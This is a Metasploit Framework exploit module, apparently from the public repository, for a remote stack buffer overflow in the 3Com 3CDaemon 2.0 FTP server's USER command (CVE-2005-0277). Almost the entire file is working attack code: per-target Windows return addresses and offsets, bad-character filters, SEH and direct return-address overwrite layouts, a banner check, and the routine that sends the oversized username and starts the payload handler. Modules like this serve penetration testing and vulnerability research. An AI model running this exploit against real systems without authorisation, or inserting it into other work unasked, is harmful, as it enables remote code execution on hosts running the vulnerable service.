GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  # Ftp supplies connect/disconnect/send_cmd/banner; Seh supplies generate_seh_payload.
  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::Seh

  # Registers module metadata: name, references, payload constraints and the
  # per-target return-address / offset pairs consumed by #exploit.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => '3Com 3CDaemon 2.0 FTP Username Overflow',
      'Description' => %q{
        This module exploits a vulnerability in the 3Com 3CDaemon
        FTP service. This package is being distributed from the 3Com
        web site and is recommended in numerous support documents.
        This module uses the USER command to trigger the overflow.
      },
      'Author' =>
        [
          'hdm', # Original author
          'otr' # Windows XP SP3
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2005-0277'],
          [ 'OSVDB', '12810'],
          [ 'OSVDB', '12811'],
          [ 'BID', '12155']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          # Index into 'Targets' below: Windows 2000 English by default.
          'target' => 0
        },
      'Privileged' => false,
      'Payload' =>
        {
          'Space' => 674,
          # Bytes the USER argument cannot carry (NUL, CR/LF, space, quote and
          # path/separator characters). #exploit passes payload_badchars to
          # rand_text_english so the filler text avoids the same set.
          'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
          'StackAdjustment' => -3500,
          'Compat' =>
            {
              'ConnectionType' => "-find"
            }
        },
      'Platform' => %w{ win },
      # Each target pairs a return address ('Ret') with the position in the USER
      # argument ('Offset') where #exploit writes that address (or the SEH record).
      'Targets' =>
        [
          [
            'Windows 2000 English', # Tested OK - hdm 11/24/2005
            {
              'Platform' => 'win',
              'Ret' => 0x75022ac4, # ws2help.dll
              'Offset' => 229,
            },
          ],
          [
            'Windows XP English SP0/SP1',
            {
              'Platform' => 'win',
              'Ret' => 0x71aa32ad, # ws2help.dll
              'Offset' => 229,
            },
          ],
          [
            'Windows NT 4.0 SP4/SP5/SP6',
            {
              'Platform' => 'win',
              'Ret' => 0x77681799, # ws2help.dll
              'Offset' => 229,
            },
          ],
          [
            'Windows 2000 Pro SP4 French',
            {
              'Platform' => 'win',
              'Ret' => 0x775F29D0,
              'Offset' => 229,
            },
          ],
          # Index 4 is handled differently in #exploit (direct return-address
          # overwrite rather than the SEH path used by the targets above).
          [
            'Windows XP English SP3',
            {
              'Platform' => 'win',
              'Ret' => 0x7CBD41FB, # 7CBD41FB JMP ESP shell32.data SP3
              #'Ret' => 0x775C2C1F, # 775C2C1F JMP ESP shell32.data SP1
              'Offset' => 245,
            },
          ],
        ],
      'DisclosureDate' => '2005-01-04'))
  end

  # Fingerprints the service from the FTP greeting captured by the Ftp mixin
  # during connect. The regex only confirms the product/version string, not
  # exploitability, so the positive result is Appears rather than Vulnerable.
  #
  # @return [Exploit::CheckCode] Appears on a matching banner, Safe otherwise
  def check
    connect
    disconnect
    if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/)
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  # Builds the oversized USER argument for the selected target, sends it, and
  # hands off to the payload handler.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    # targets[4] (Windows XP English SP3) uses a direct overwrite: filler up to
    # the offset, the little-endian return address twice, then the payload.
    # NOTE(review): selecting the layout by array index is brittle — reordering
    # 'Targets' would silently switch a target onto the wrong code path; a
    # per-target flag in the metadata hash would be the robust form.
    if (target == targets[4])
      buf = rand_text_english(target['Offset'], payload_badchars)
      buf << [ target['Ret'] ].pack('V') * 2
      buf << payload.encoded
    else
      # All other targets go through the Seh mixin: a 2048-byte filler with the
      # generated SEH record spliced in at the target's offset.
      buf = rand_text_english(2048, payload_badchars)
      seh = generate_seh_payload(target.ret)
      buf[target['Offset'], seh.length] = seh
    end

    # Second argument is false: presumably tells send_cmd not to wait for a
    # reply, since the service is not expected to answer — confirm against the
    # Ftp mixin.
    send_cmd( ['USER', buf] , false )

    handler
    disconnect
  end
end